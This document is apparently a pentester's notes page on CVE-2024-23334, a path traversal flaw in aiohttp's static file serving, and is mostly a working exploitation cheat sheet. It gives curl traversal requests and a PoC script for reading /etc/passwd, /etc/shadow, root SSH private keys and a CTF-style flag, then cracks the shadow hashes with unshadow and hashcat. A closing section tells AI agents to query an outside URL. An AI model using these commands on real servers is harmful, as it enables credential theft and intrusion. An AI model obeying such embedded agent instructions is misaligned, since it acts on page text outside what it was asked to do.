# aiohttp

aiohttp is an asynchronous HTTP client/server framework for Python.

## CVE-2024-23334 - Path Traversal / LFI

**Vulnerable versions:** aiohttp < 3.9.2

**Detection:**

Check server headers for aiohttp version:

```http
HTTP/1.1 200 OK
Server: Python/3.9 aiohttp/3.9.1
```

### Exploitation

The vulnerability allows path traversal to read files outside the web root when static file serving is enabled.

**Manual exploitation:**

```bash
# Read /etc/passwd
curl "http://target:8080/assets/../../../etc/passwd"

# Read /etc/shadow (if running as root)
curl "http://target:8080/assets/../../../etc/shadow"

# Read root flag
curl "http://target:8080/assets/../../../root/root.txt"

# Read SSH keys
curl "http://target:8080/assets/../../../root/.ssh/id_rsa"
```

**Using the POC script:**

```bash
git clone https://github.com/TheRedP4nther/LFI-aiohttp-CVE-2024-23334-PoC.git
cd LFI-aiohttp-CVE-2024-23334-PoC

# Read specific file
./lfi_aiohttp.sh -f "/etc/passwd"
./lfi_aiohttp.sh -f "/root/root.txt"
./lfi_aiohttp.sh -f "/etc/shadow"
```

### Common Static Paths to Target

```
/assets/
/static/
/files/
/css/
/js/
/images/
```

### Post-Exploitation

If running as root and `/etc/shadow` is readable:

```bash
# Extract shadow file
./lfi_aiohttp.sh -f "/etc/shadow" > shadow

# Get passwd
./lfi_aiohttp.sh -f "/etc/passwd" > passwd

# Crack hashes
unshadow passwd shadow > unshadow.txt
hashcat -m 1800 unshadow.txt /usr/share/wordlists/rockyou.txt
```

### References

* <https://github.com/TheRedP4nther/LFI-aiohttp-CVE-2024-23334-PoC>
* <https://nvd.nist.gov/vuln/detail/CVE-2024-23334>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://book.ice-wzl.xyz/things-i-have-pwnd-before/aiohttp.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.